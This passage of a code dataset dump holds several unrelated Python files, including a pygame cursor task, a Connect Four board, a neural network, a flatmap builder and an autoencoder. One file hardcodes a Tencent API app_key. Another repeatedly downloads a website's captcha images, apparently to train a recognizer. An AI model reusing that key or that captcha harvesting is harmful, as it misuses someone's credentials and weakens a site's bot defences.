features.hdf_features import 
SaveHDF\n\nclass CursorControl(ManualControlMulti, WindowDispl2D):\n '''\n this class implements a python cursor control task for human\n '''\n\n def __init__(self, *args, **kwargs):\n # just run the parent ManualControlMulti's initialization\n self.move_step = 1\n\n # Initialize target location variable\n #target location and index have been initializd\n\n super(CursorControl, self).__init__(*args, **kwargs)\n\n def init(self):\n pygame.init()\n\n \n\n self.assist_level = (0, 0)\n super(CursorControl, self).init()\n\n # override the _cycle function\n def _cycle(self):\n #print(self.state)\n\n #target and plant data have been saved in\n #the parent manualcontrolmultitasks\n\n self.move_effector_cursor()\n super(CursorControl, self)._cycle()\n\n # do nothing\n def move_effector(self):\n pass\n\n def move_plant(self, **kwargs):\n pass\n\n # use keyboard to control the task\n def move_effector_cursor(self):\n np.array([0., 0., 0.])\n curr_pos = copy.deepcopy(self.plant.get_endpoint_pos())\n\n for event in pygame.event.get():\n if event.type == pygame.KEYUP:\n if event.type == pygame.K_q:\n pygame.quit()\n quit()\n if event.key == pygame.K_LEFT:\n curr_pos[0] -= self.move_step\n if event.key == pygame.K_RIGHT:\n curr_pos[0] += self.move_step\n if event.key == pygame.K_UP:\n curr_pos[2] += self.move_step\n if event.key == pygame.K_DOWN:\n curr_pos[2] -= self.move_step\n #print('Current position: ')\n #print(curr_pos)\n\n # set the current position\n self.plant.set_endpoint_pos(curr_pos)\n\n def _start_wait(self):\n self.wait_time = 0.\n super(CursorControl, self)._start_wait()\n\n def _test_start_trial(self, ts):\n return ts > self.wait_time and not self.pause\n\n#this task can be run on its\n#we will not involve database at this time\ntarget_pos_radius = 10\n\ndef target_seq_generator(n_targs, n_trials):\n #generate targets\n angles = np.transpose(np.arange(0,2*np.pi,2*np.pi / n_targs))\n unit_targets = targets = np.stack((np.cos(angles), np.sin(angles)),1)\n targets = unit_targets * target_pos_radius\n\n center = np.array((0,0))\n\n target_inds = np.random.randint(0, n_targs, n_trials)\n target_inds[0:n_targs] = np.arange(min(n_targs, n_trials))\n\n k = 0\n while k < n_trials:\n targ = targets[target_inds[k], :]\n yield np.array([[center[0], 0, center[1]],\n [targ[0], 0, targ[1]]])\n k += 1\n\n\nif __name__ == \"__main__\":\n print('Remember to set window size in stereoOpenGL class')\n gen = target_seq_generator(8, 1000)\n\n #incorporate the saveHDF feature by blending code\n #see tests\\start_From_cmd_line_sim\n \n base_class = CursorControl\n feats = [SaveHDF]\n Exp = experiment.make(base_class, feats=feats)\n print(Exp)\n\n exp = Exp(gen)\n exp.init()\n exp.run() #start the task\n \n\n\n ","sub_path":"built_in_tasks/cursorControlTasks_saveHDF.py","file_name":"cursorControlTasks_saveHDF.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"538295948","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/4/16 17:22\n# @Author : DGG\n# @Site : \n# @File : captcha.py\n# @Software: PyCharm\nimport time\nimport urllib.parse\nimport hashlib\nimport base64\nimport requests\nimport json\n\n#获取签名\ndef get_request_sign(user_parms={}):\n default_parms = {\n 'app_id' : '1106681869',\n 'time_stamp' : int(time.time()),\n 'nonce_str' : 'fa577ce340859f9fe'\n }\n app_key = 'eW57iuWa7HkpOcFM'\n parms = dict(default_parms,**user_parms)\n\n sort_parms = sorted(parms.items(),key=lambda item:item[0])\n\n str_parms = 
urllib.parse.urlencode(dict(sort_parms))\n\n    appKey_parms = str_parms + '&app_key=' + app_key\n    hd5 = hashlib.md5(appKey_parms.encode(\"utf-8\"))\n    sign = hd5.hexdigest().upper()\n    parms['sign'] = sign\n    return parms\n\n\nwith open('images/imgNum.jpg','rb') as f:\n    img = base64.b64encode(f.read())\n    data = get_request_sign({'image':img})\n    res = requests.post('https://api.ai.qq.com/fcgi-bin/ocr/ocr_generalocr',data=data)\n    print(res.json())\n\n\n","sub_path":"tenxun_ai.py","file_name":"tenxun_ai.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"314079506","text":"\n# Takes a number, tests if it works, adds it to board, reports back if it's a win\n# Error list:\n# 1 = move not an int\n# 2 = move not between 1 - 7\n# 3 = no spot available\n\nclass Board():\n    def __init__(self):\n        self.board_dict = {1:'.', 2:'.', 3:'.', 4:'.', 5:'.', 6:'.', 7:'.', 8:'.', 9:'.', 10:'.', 11:'.', 12:'.', 13:'.', 14:'.', 15:'.', 16:'.', 17:'.', 18:'.', 19:'.', 20:'.', 21:'.', 22:'.', 23:'.', 24:'.', 25:'.', 26:'.', 27:'.', 28:'.', 29:'.', 30:'.', 31:'.', 32:'.', 33:'.', 34:'.', 35:'.', 36:'.', 37:'.', 38:'.', 39:'.', 40:'.', 41:'.', 42:'.'}\n        self.move_list = []\n        self.error = 0\n        self.turn_count = 0\n\n    def print_board(self):\n        i = 36\n        print(\"\")\n        while i > 0:\n            print(self.board_dict[i], end =\"\")\n            if i % 7 == 0 and i != 36:\n                print(\"\")\n                i -= 14\n            i += 1\n        print(\"\")\n\n    def is_error(self, move):\n        # Make sure move is an INT\n        try:\n            int(move)\n        except:\n            error = 1\n            return error\n        # Makes sure move is between 1-7\n        if 1 > move or move > 7:\n            error = 2\n            return error\n        # Make sure move is still on the board\n        i = 0\n        while move in self.move_list:\n            move += 7\n            i += 1\n            if i > 5:\n                error = 3\n                return error\n            pass\n        else:\n            error = self.error\n            return error\n\n    def board_move(self, move, player_piece):\n        move = int(move)\n\n        while self.board_dict[move] != '.':\n            move += 7\n            if move > 42:\n                break\n\n        # while move in self.move_list:\n        #     move += 7\n\n        self.board_dict[move] = player_piece\n        self.move_list.append(move)\n        self.turn_count += 1\n\n        return self.board_dict\n\n    def is_win(self):\n        game_won = False\n        # A = Horizontal, B = Vertical, C = Diagonal Right, D = Diagonal Left\n        win_possibilities = [\"A\", \"B\", \"C\", \"D\"]\n        # Wincomb_dict Structure = [[starting moves], [add number, how many iterations on current row], [add number to get to next row, how many rows to try]]\n        wincomb_dict = {'A': [[1,2,3,4], [1,4], [7,6]], 'B': [[1,8,15,22],[7,3],[1,7]], 'C': [[1,9,17,25],[1,4],[7,3]], 'D': [[4,10,16,22],[1,4],[7,3]]}\n        for wp in win_possibilities:\n            y = 0\n            for j in range(wincomb_dict[wp][2][1]):\n                x = 0\n                for i in range(wincomb_dict[wp][1][1]):\n                    if self.board_dict[wincomb_dict[wp][0][0]+x+y] == self.board_dict[wincomb_dict[wp][0][1]+x+y] == self.board_dict[wincomb_dict[wp][0][2]+x+y] == self.board_dict[wincomb_dict[wp][0][3]+x+y] != '.':\n                        game_won = True\n                        # To print cause of victory:\n                        # print(wp)\n                        return game_won\n                    x = x + wincomb_dict[wp][1][0]\n                y = y + wincomb_dict[wp][2][0]\n        return game_won\n\n    def take_back(self):\n        last_move = self.move_list[-1]\n        self.board_dict[last_move] = '.'\n        del self.move_list[-1]\n","sub_path":"old_version/Archive/board_class.py","file_name":"board_class.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"293966735","text":"#Gabriel Oliveira Borges, RA:197458, Ciência da Computação 018\n#Note: the professor said during Thursday's class (21/03) that it would not be necessary to use Jupyter Notebook\n\nimport random\nimport matplotlib.pyplot as plt; plt.rcdefaults()\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nqtdJogos = 100000\n\ndef tiraUm(palpite, correto, portas):\n    for i in portas:\n        if i != correto and i != palpite:\n            return i\n\ndef escolhePorta(portas):\n    return random.randint(1, len(portas))\n\ndef mudaPorta(palpite, portas):\n    for i in portas:\n        if i != palpite:\n            return i\n\ndef montaGrafico(naoMudou, mudou):\n    n_groups = 2\n\n    #create plot\n    ax = plt.subplots()\n    index = np.arange(n_groups)\n    barWidth = 0.35\n    opacity = 0.8\n\n    rects1 = plt.bar(index, mudou, barWidth, alpha = opacity, color = 'b', label = 'Acertou')\n    rects2 = plt.bar(index + barWidth, naoMudou, barWidth, alpha = opacity, color = 'g', label = 'Errou')\n\n\n    plt.ylabel('Porcentagem\\n(%)')\n    plt.title('Porcentagem de acertos e erros no jogo das portas. \\nForam realizados {} jogos'.format(qtdJogos))\n    plt.xticks(index + barWidth/2, ('Manteve porta', 'Mudou de porta'))\n    plt.legend()\n\n    plt.tight_layout()\n\n    plt.show()\n\ndef main():\n    print('Fazendo simulações')\n    qtdAcertos = 0\n    qtdErros = 0\n\n    #does not switch doors\n    for i in range(qtdJogos):\n        portas = [1, 2, 3]\n        palpite = escolhePorta(portas)\n        correto = escolhePorta(portas)\n        portas.remove(tiraUm(palpite, correto, portas))\n        if palpite == correto:\n            qtdAcertos += 1\n        else:\n            qtdErros += 1\n\n    qtdAcertosMuda = 0\n    qtdErrosMuda = 0\n    #switches doors\n    for i in range(qtdJogos):\n        portas = [1, 2, 3]\n        palpite = escolhePorta(portas)\n        correto = escolhePorta(portas)\n        portas.remove(tiraUm(palpite, correto, portas))\n        palpite = mudaPorta(palpite, portas)\n        if palpite == correto:\n            qtdAcertosMuda += 1\n        else:\n            qtdErrosMuda += 1\n\n\n    montaGrafico((qtdAcertosMuda*100/qtdJogos, qtdErrosMuda*100/qtdJogos), (qtdAcertos*100/qtdJogos, qtdErros*100/qtdJogos))\n\n\nmain()\n\n\n\n\n\n","sub_path":"programaprob.py","file_name":"programaprob.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"305604466","text":"def answer(population, x, y, strength):\n    if population[y][x] > strength:\n        return population\n    infect_list = [(y, x)]\n    for tup in infect_list:\n        i = tup[0]\n        j = tup[1]\n        if population[i][j] <= strength:\n            population[i][j] = -1\n            if i-1 >= 0 and population[i - 1][j] != -1 and population[i - 1][j] <= strength:\n                if (i - 1, j) not in infect_list: infect_list.append((i - 1, j))\n            if i+1 < len(population) and population[i + 1][j] != -1 and population[i + 1][j] <= strength:\n                if (i + 1, j) not in infect_list: infect_list.append((i + 1, j))\n            if j-1 >= 0 and population[i][j - 1] != -1 and population[i][j - 1] <= strength:\n                if (i, j - 1) not in infect_list: infect_list.append((i, j - 1))\n            if j+1 < len(population[i]) and population[i][j + 1] != -1 and population[i][j + 1] <= strength:\n                if (i, j + 1) not in infect_list: infect_list.append((i, j + 1))\n    return population\n\n\nprint(answer([[6, 7, 2, 7, 6], [6, 3, 1, 4, 7], [0, 2, 4, 1, 10], [8, 1, 1, 4, 9], [8, 7, 4, 9, 9]],1,2,5))\n\n","sub_path":"zombit_infection.py","file_name":"zombit_infection.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"554562381","text":"\"\"\"\nif else conditions\n\"\"\"\nkosul = False\nif (kosul):\n    print(\"koşul doğru\")\nelse:\n    print(\"koşul 
yanlış\")\n\nyas=int(input(\"yaşını gir.. \"))\nif yas > 18:\n print(\"hoşgeldin\")\nelse:\n print(\"yaş doğrulanmadı\")\n\na=3\nb=5\nc=8\n\nsecim=input(\"secim yapınız {a b c}.. \")\nif(secim == \"a\"):\n print(a)\nelif(secim == \"b\"):\n print(b)\nelif(secim == \"c\"):\n print(c)\n ","sub_path":"Ogrenciler/Erdogan-Canbay/conditions.py","file_name":"conditions.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"483073828","text":"from music21 import converter\nfrom glob import glob\n\n\ndef avg_tempos():\n res = {}\n for genre in glob('midi_files/*'):\n avg = 0\n for midi in glob(genre+'/*'):\n s = converter.parse(midi)\n m = s.metronomeMarkBoundaries()[0][2]\n avg += m.number\n avg = int(avg/33)\n genre = genre.replace('midi_files\\\\', '')\n res[genre] = avg\n return res\n\n\nif __name__ == '__main__':\n print(avg_tempos())\n","sub_path":"tempocheck.py","file_name":"tempocheck.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"131436477","text":"import numpy as np\nfrom sympy import *\nimport matplotlib.pyplot as plt\n\n# m>n for left inverse, # TAll matrix\n# m args.max_zoom:\n sys.exit('--min-zoom must be between 0 and {}'.format(args.max_zoom))\n if args.max_zoom < args.min_zoom or args.max_zoom > 15:\n sys.exit('--max-zoom must be between {} and 15'.format(args.min_zoom))\n if args.initial_zoom < args.min_zoom or args.initial_zoom > args.max_zoom:\n sys.exit('--initial-zoom must be between {} and {}'.format(args.min_zoom, args.max_zoom))\n\n map_zoom = (args.min_zoom, args.max_zoom, args.initial_zoom)\n\n if args.tile_slide > 0:\n args.background_tiles = True\n args.no_vector_tiles = True\n\n if args.powerpoint.startswith('http:') or args.powerpoint.startswith('https:'):\n response = requests.get(args.powerpoint)\n if response.status_code != requests.codes.ok:\n sys.exit('Cannot retrieve remote Powerpoint file')\n pptx_source = args.powerpoint\n pptx_modified = 0 ## Can we get timestamp from PMR metadata?? 
Or even i\n pptx_bytes = io.BytesIO(response.content)\n map_source = pptx_source\n else:\n if not os.path.exists(args.powerpoint):\n sys.exit('Missing Powerpoint file')\n pptx_source = os.path.abspath(args.powerpoint)\n pptx_modified = os.path.getmtime(pptx_source)\n pptx_bytes = open(pptx_source, 'rb')\n map_source = 'file:/{}'.format(pptx_source)\n\n if args.background_tiles:\n pdf_source = '{}.pdf'.format(os.path.splitext(pptx_source)[0])\n if pdf_source.startswith('http:') or pdf_source.startswith('https:'):\n response = requests.get(pdf_source)\n if response.status_code != requests.codes.ok:\n pptx_bytes.close()\n sys.exit('Cannot retrieve PDF of Powerpoint (needed to generate background tiles)')\n pdf_bytes = io.BytesIO(response.content)\n else:\n if not os.path.exists(pdf_source):\n pptx_bytes.close()\n sys.exit('Missing PDF of Powerpoint (needed to generate background tiles)')\n if os.path.getmtime(pdf_source) < pptx_modified:\n pptx_bytes.close()\n sys.exit('PDF of Powerpoint is too old...')\n with open(pdf_source, 'rb') as f:\n pdf_bytes = f.read()\n\n map_dir = os.path.join(args.map_base, args.map_id)\n args.output_dir = map_dir\n\n args.label_database = os.path.join(args.map_base, 'labels.sqlite')\n\n map_models = ''\n\n if not os.path.exists(map_dir):\n os.makedirs(map_dir)\n\n#* # Labels and relationships between anatomical entities\n\n#* args.ontology_data = OntologyData()\n#* args.layer_mapping = LayerMapping('./layers.json', 'features')\n\n filenames = []\n upload_files = ['index.mbtiles']\n\n print('Extracting layers...')\n map_extractor = GeoJsonExtractor(pptx_bytes, args)\n\n # Process slides, saving layer information\n\n annotations = {}\n map_layers = []\n pathways_list = []\n tippe_inputs = []\n for slide_number in range(1, len(map_extractor)+1):\n if args.tile_slide > 0 and args.tile_slide != slide_number:\n continue\n\n layer = map_extractor.slide_to_layer(slide_number,\n debug_xml=args.debug_xml)\n for error in layer.errors:\n print(error)\n\n if layer.zoom is not None:\n map_zoom = layer.zoom\n\n map_layer = {\n 'id': layer.layer_id,\n 'slide-id': layer.slide_id,\n 'description': layer.description,\n 'selectable': layer.selectable,\n 'selected': layer.selected,\n 'queryable-nodes': layer.queryable_nodes,\n 'features': layer.map_features\n }\n if layer.background_for:\n map_layer['background_for'] = layer.background_for\n map_layers.append(map_layer)\n if layer.resolved_pathways is not None:\n pathways_list.append(layer.resolved_pathways)\n\n if layer.models:\n map_models = layer.models\n\n if layer.selectable:\n annotations.update(layer.annotations)\n for (layer_name, filename) in layer.save().items():\n filenames.append(filename)\n tippe_inputs.append({\n 'file': filename,\n 'layer': layer_name,\n 'description': '{} -- {}'.format(layer.description, layer_name)\n })\n\n # We are finished with the Powerpoint\n\n pptx_bytes.close()\n\n if len(map_layers) == 0:\n sys.exit('No map layers in Powerpoint...')\n\n if args.check_errors:\n # Show what the map is about\n if map_models:\n print('Checked map for {}'.format(map_models))\n\n else:\n\n layer_ids = [layer['id'] for layer in map_layers]\n\n # Get our map's actual bounds and centre\n\n bounds = map_extractor.bounds()\n map_centre = [(bounds[0]+bounds[2])/2, (bounds[1]+bounds[3])/2]\n map_bounds = [bounds[0], bounds[3], bounds[2], bounds[1]] # southwest and northeast ccorners\n\n # The vector tiles' database\n\n mbtiles_file = os.path.join(map_dir, 'index.mbtiles')\n\n if len(tippe_inputs) == 0:\n sys.exit('No 
selectable layers in Powerpoint...')\n\n # Generate Mapbox vector tiles\n print('Running tippecanoe...')\n\n subprocess.run(['tippecanoe', '--projection=EPSG:4326', '--force',\n # No compression results in a smaller `mbtiles` file\n # and is also required to serve tile directories\n '--no-tile-compression',\n '--buffer=100',\n '--minimum-zoom={}'.format(map_zoom[0]),\n '--maximum-zoom={}'.format(map_zoom[1]),\n '--output={}'.format(mbtiles_file),\n ]\n + list([\"-L{}\".format(json.dumps(input)) for input in tippe_inputs])\n )\n\n # `tippecanoe` uses the bounding box containing all features as the\n # map bounds, which is not the same as the extracted bounds, so update\n # the map's metadata\n\n tile_db = MBTiles(mbtiles_file)\n\n tile_db.update_metadata(center=','.join([str(x) for x in map_centre]),\n bounds=','.join([str(x) for x in map_bounds]))\n\n tile_db.execute(\"COMMIT\")\n\n if args.tile_slide == 0:\n # Save path of the Powerpoint source\n tile_db.add_metadata(source=map_source) ## We don't always want this updated...\n ## e.g. if re-running after tile generation\n # What the map models\n if map_models:\n tile_db.add_metadata(describes=map_models)\n\n # Save layer details in metadata\n tile_db.add_metadata(layers=json.dumps(map_layers))\n\n # Save pathway details in metadata\n tile_db.add_metadata(pathways=pathways_to_json(pathways_list))\n\n # Save annotations in metadata\n tile_db.add_metadata(annotations=json.dumps(annotations))\n\n # Save command used to run mapmaker\n tile_db.add_metadata(created_by=' '.join(sys.argv))\n\n # Save the maps creation time\n tile_db.add_metadata(created=datetime.datetime.utcnow().isoformat())\n\n#* ## TODO: set ``layer.properties`` for annotations...\n#* ##update_RDF(args.map_base, args.map_id, map_source, annotations)\n # Commit updates to the database\n tile_db.execute(\"COMMIT\")\n\n\n\n print('Creating style files...')\n\n map_index = {\n 'id': args.map_id,\n 'min-zoom': map_zoom[0],\n 'max-zoom': map_zoom[1],\n 'bounds': map_bounds,\n 'version': FLATMAP_VERSION,\n 'image_layer': (args.background_tiles\n or os.path.isfile(os.path.join(map_dir, '{}.mbtiles'.format(layer_ids[0])))),\n }\n\n if map_models:\n map_index['describes'] = map_models\n\n # Create `index.json` for building a map in the viewer\n\n with open(os.path.join(map_dir, 'index.json'), 'w') as output_file:\n json.dump(map_index, output_file)\n\n # Create style file\n\n metadata = tile_db.metadata()\n\n style_dict = Style.style(layer_ids, metadata, map_zoom)\n with open(os.path.join(map_dir, 'style.json'), 'w') as output_file:\n json.dump(style_dict, output_file)\n\n # Create TileJSON file\n\n json_source = tile_json(args.map_id, map_zoom, map_bounds)\n with open(os.path.join(map_dir, 'tilejson.json'), 'w') as output_file:\n json.dump(json_source, output_file)\n\n upload_files.extend(['index.json', 'style.json', 'tilejson.json'])\n\n if args.tile_slide == 0:\n # We are finished with the tile database, so close it\n tile_db.close();\n\n if args.background_tiles:\n print('Generating background tiles (may take a while...)')\n upload_files.extend(make_background_tiles(map_bounds, map_zoom, map_dir,\n pdf_source, pdf_bytes, layer_ids, args.tile_slide))\n\n # Show what the map is about\n if map_models:\n print('Generated map for {}'.format(map_models))\n\n if args.upload:\n upload = ' '.join([ '{}/{}'.format(args.map_id, f) for f in upload_files ])\n cmd_stream = os.popen('tar -C {} -c -z {} | ssh {} \"tar -C /flatmaps -x -z\"'\n .format(args.map_base, upload, args.upload))\n 
print('Uploaded map...', cmd_stream.read())\n\n    # Tidy up\n    print('Cleaning up...')\n\n    for filename in filenames:\n        if args.save_geojson:\n            print(filename)\n        else:\n            os.remove(filename)\n\n#===============================================================================\n\nif __name__ == '__main__':\n    main()\n\n#===============================================================================\n","sub_path":"mapmaker/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":14285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"573517604","text":"from django.conf.urls import url, include\nfrom restaurant import views\n\nurlpatterns = [\n    # url(r'^$', views.API.as_view(), name='home-view'),\n    url(r'^$', views.list, name='home'),\n    url(r'^new$', views.new, name='new'),\n    url(r'^search$', views.search, name='search'),\n    url(r'^(?P<pk>[0-9]+)/edit/$', views.update, name='update'),\n    url(r'^restaurants/delete/$', views.delete, name='delete'),\n    url(r'^(?P<pk>[0-9]+)/menus/', include('menu.urls')),\n]\n","sub_path":"mymenu/restaurant/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"299374251","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\n@version: 1.0\n@author: ‘yuxuecheng‘\n@contact: yuxuecheng@baicdata.com\n@software: PyCharm Community Edition\n@file: get_picture.py\n@time: 2017/4/24 10:00 AM\n\"\"\"\n\nimport urllib2\n\npicture_url = \"http://121.40.187.211:8080/index.php/Public/verify/0.7356425633784405\"\n\nif __name__ == '__main__':\n    for index in range(1000):\n        response = urllib2.urlopen(picture_url)\n        content = response.read()\n        picture_name = \"data/%d.bmp\" % index\n        with open(picture_name, mode='w') as fd:\n            fd.write(content)\n","sub_path":"scikit_learn/examples/Recognizing-hand-written-digits/get_picture.py","file_name":"get_picture.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"79231785","text":"import numpy as np\nfrom activations import Relu\nfrom activations import Linear\nfrom dropout import DropNull\nimport random\n\nclass MatrixNetwork:\n    \"\"\"The code for this class is a modified version of that provided in Michael Nielsen's\n    fantastic free book: http://neuralnetworksanddeeplearning.com\n    \"\"\"\n\n    def __init__(self, weights, biases, activations, name='network', drop_scheme=None):\n        \"\"\"Create a neural network, specified by the layers which have varying sizes and activations\"\"\"\n        self.num_layers = len(weights)+1\n        self.weights = weights\n        self.biases = biases\n        self.activations = activations\n        self.name = name\n        #self.drop_scheme = drop_scheme\n\n    def feedforward(self, a):\n        # Return the output of the network if 'a' is input\n        for b, w, act in zip(self.biases, self.weights, self.activations):\n            z = act.weighted_sum(w, b, a)\n            a = act.apply(z)\n        return a\n\n    def feedforward_to(self, a, l):\n        \"\"\"Only feedforward to the layer l\"\"\"\n        current_layer = 0\n        for b, w, act in zip(self.biases, self.weights, self.activations):\n            if current_layer == l:\n                break\n            z = act.weighted_sum(w, b, a)\n            a = act.apply(z)\n            current_layer += 1\n        return a\n\n    def update_mini_batch(self, mini_batch, epoch):\n        #self.drop_scheme.new_batch()\n        \"\"\"Update the network's weights and biases by applying\n        gradient descent using backpropagation on a single mini batch.\n        The 'mini_batch' is a tuple (x, y) of input and target matrices.\"\"\"\n        d, m = mini_batch[0].shape\n        nabla_w, nabla_b, dzs = self.get_grads_for_mini_batch(mini_batch)\n        #nabla_w = self.drop_scheme.drop_grads(nabla_w)\n        if epoch > 20:\n            self.weights = [act.opt().update_weights(w, dw, m)\n                            for w, dw, act in zip(self.weights, nabla_w, self.activations)]\n            self.biases = [act.opt().update_biases(b, db, m)\n                           for b, db, act in zip(self.biases, nabla_b, self.activations)]\n        return nabla_w, nabla_b, dzs\n\n    def get_grads_for_mini_batch(self, mini_batch):\n        x, y = mini_batch\n        return self.backprop(x, y)\n        # nabla_b = self.backprop(mini_bax, ytch)\n        # nabla_w = [np.zeros(w.shape) for w in self.weights]\n        # dzs = []\n        # for x, y in mini_batch:\n        #     delta_nabla_b, delta_nabla_w, dz = self.backprop(x, y)\n        #     nabla_b = [nb + dnb for nb, dnb in zip(nabla_b, delta_nabla_b)]\n        #     nabla_w = [nw + dnw for nw, dnw in zip(nabla_w, delta_nabla_w)]\n        #     dzs.append(dz)\n        # return nabla_w, nabla_b, dzs\n\n\n    def backprop(self, x, y):\n        \"\"\"Return a tuple ``(nabla_b, nabla_w)`` representing the\n        gradient for the cost function C_x. ``nabla_b`` and\n        ``nabla_w`` are layer-by-layer lists of numpy arrays, similar\n        to ``self.biases`` and ``self.weights``.\"\"\"\n        nabla_b = [None for b in self.biases]\n        nabla_w = [None for w in self.weights]\n        nabla_z = []\n        # feedforward\n        a = x\n        a_values = [x] # list to store all the activations, layer by layer\n        #weights = self.drop_scheme.drop_weights(self.weights)\n        weights = self.weights\n        for b, w, act in zip(self.biases, weights, self.activations):\n            z = act.weighted_sum(w, b, a)\n            a = act.apply(z)\n            a_values.append(a)\n\n        # backward pass\n        act = self.activations[-1]\n        delta = self.cost_derivative(a, y) * act.prime(a_values[-1])\n        nabla_z.append(delta)\n        nabla_w[-1], nabla_b[-1] = act.weight_grad(delta, a_values[-2])\n        nabla_b[-1] = np.sum(nabla_b[-1], axis=1).reshape(self.biases[-1].shape)\n        for l in range(2, self.num_layers):\n            act = self.activations[-l]\n            ap = act.prime(a_values[-l])\n            delta = np.matmul(weights[-l+1].transpose(), delta) * ap\n            nabla_z.append(delta)\n            nabla_w[-l], nabla_b[-l] = act.weight_grad(delta, a_values[-l - 1])\n            nabla_b[-l] = np.sum(nabla_b[-l], axis=1).reshape(self.biases[-l].shape)\n        nabla_z.reverse()\n        return nabla_w, nabla_b, nabla_z\n\n    def cost_derivative(self, a, y):\n        \"\"\"Return the vector of partial derivatives \\\partial C_x /\n        \\\partial a for the output activations.\"\"\"\n        return a - y\n\n    def cost(self, batch):\n        X, Y = batch\n        A = self.feedforward(X)\n        return 1 / 2.0 * np.sum((Y - A) ** 2.0)\n\n    def cost_data_set(self, batches):\n        return sum([self.cost(batch) for batch in batches])\n\n    def half_weights(self):\n        pass\n        #self.drop_scheme.half_weights(self.weights)\n\n    def double_weights(self):\n        pass\n        #self.drop_scheme.double_weights(self.weights)\n\n","sub_path":"srcNN/network/network_matrix.py","file_name":"network_matrix.py","file_ext":"py","file_size_in_byte":4859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"156477152","text":"# -*- coding: utf-8 -*-\n\nimport tensorflow as tf\nimport tensorlayer as tl\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nfrom tensorflow.examples.tutorials.mnist import input_data\n\ntl.logging.set_verbosity(tl.logging.DEBUG)\n\nmnist = input_data.read_data_sets(train_dir=\"D:/mnist\")\ntrain_mnist = tf.data.Dataset.from_tensor_slices(tensors=(mnist.train.images))\ntrain_mnist_iterator = 
train_mnist.repeat().batch(batch_size=250).make_initializable_iterator()\nnext_batch = train_mnist_iterator.get_next()\n\n# 定义学习率\nlearning_rate = 0.01\n\n# 隐含层设置\n\nn_hidden_1 = 256\nn_hidden_2 = 64\nn_hidden_3 = 16\nn_hidden_4 = 2\n\nn_input = 784\n\n# 定义输入占位符\nX = tf.placeholder(dtype=tf.float32, shape=(None, n_input))\n\n\ndef encoder_network(inputs, isTrain=True, reuse=False):\n with tf.variable_scope(name_or_scope=\"encoder\", reuse=reuse):\n network = tl.layers.InputLayer(inputs=inputs, name=\"inputs\")\n network = tl.layers.DenseLayer(prev_layer=network, n_units=n_hidden_1, act=tf.nn.sigmoid, name=\"encoder_hidden_1\")\n network = tl.layers.DropoutLayer(prev_layer=network, keep=0.5, name=\"drop_1\", is_train=isTrain, is_fix=True)\n network = tl.layers.DenseLayer(prev_layer=network, n_units=n_hidden_2, act=tf.nn.sigmoid, name=\"encoder_hidden_2\")\n network = tl.layers.DropoutLayer(prev_layer=network, keep=0.5, name=\"drop_2\", is_train=isTrain, is_fix=True)\n network = tl.layers.DenseLayer(prev_layer=network, n_units=n_hidden_3, act=tf.nn.sigmoid, name=\"encoder_hidden_3\")\n network = tl.layers.DropoutLayer(prev_layer=network, keep=0.5, name=\"drop_3\", is_train=isTrain, is_fix=True)\n network = tl.layers.DenseLayer(prev_layer=network, n_units=n_hidden_4, act=tf.nn.sigmoid, name=\"encoder_outputs\")\n return network\n\n\ndef decoder_network(inputs, reuse):\n with tf.variable_scope(name_or_scope=\"decoder\", reuse=reuse):\n network = tl.layers.DenseLayer(prev_layer=inputs, n_units=n_hidden_3, act=tf.nn.sigmoid, name=\"decoder_hidden_1\")\n network = tl.layers.DenseLayer(prev_layer=network, n_units=n_hidden_2, act=tf.nn.sigmoid, name=\"decoder_hidden_2\")\n network = tl.layers.DenseLayer(prev_layer=network, n_units=n_hidden_1, act=tf.nn.sigmoid, name=\"decoder_hidden_3\")\n network = tl.layers.DenseLayer(prev_layer=network, n_units=n_input, act=tf.nn.sigmoid, name=\"decoder_outputs\")\n return network\n\n\ntrain_encoder_net = encoder_network(inputs=X, isTrain=True, reuse=False)\ntest_encoder_net = encoder_network(inputs=X, isTrain=False, reuse=True)\ntrain_decoder_net = decoder_network(inputs=train_encoder_net, reuse=False)\ntest_decoder_net = decoder_network(inputs=test_encoder_net, reuse=True)\n# 添加正则化罚项\nl2_loss_list = []\nfor var in train_encoder_net.all_params:\n l2_loss_list.append(tf.nn.l2_loss(var))\n\nl2_loss = tf.reduce_mean(l2_loss_list)\n\ntrain_decoder_outputs = train_decoder_net.outputs\ntest_decoder_outputs = test_decoder_net.outputs\n\nmse = tf.reduce_mean(tf.reduce_sum(tf.squared_difference(x=train_decoder_outputs, y=X), axis=1))\n\nloss = mse + 0.001 * l2_loss\n\ntrain_step = tf.train.AdamOptimizer(learning_rate=1e-3).minimize(loss=loss)\n\nsaver = tf.train.Saver()\ncheckpoint = tf.train.get_checkpoint_state(checkpoint_dir=\"checkpoint\")\n\nwith tf.Session() as sess:\n sess.run(train_mnist_iterator.initializer)\n sess.run(tf.global_variables_initializer())\n\n if checkpoint != None and checkpoint.model_checkpoint_path != None:\n 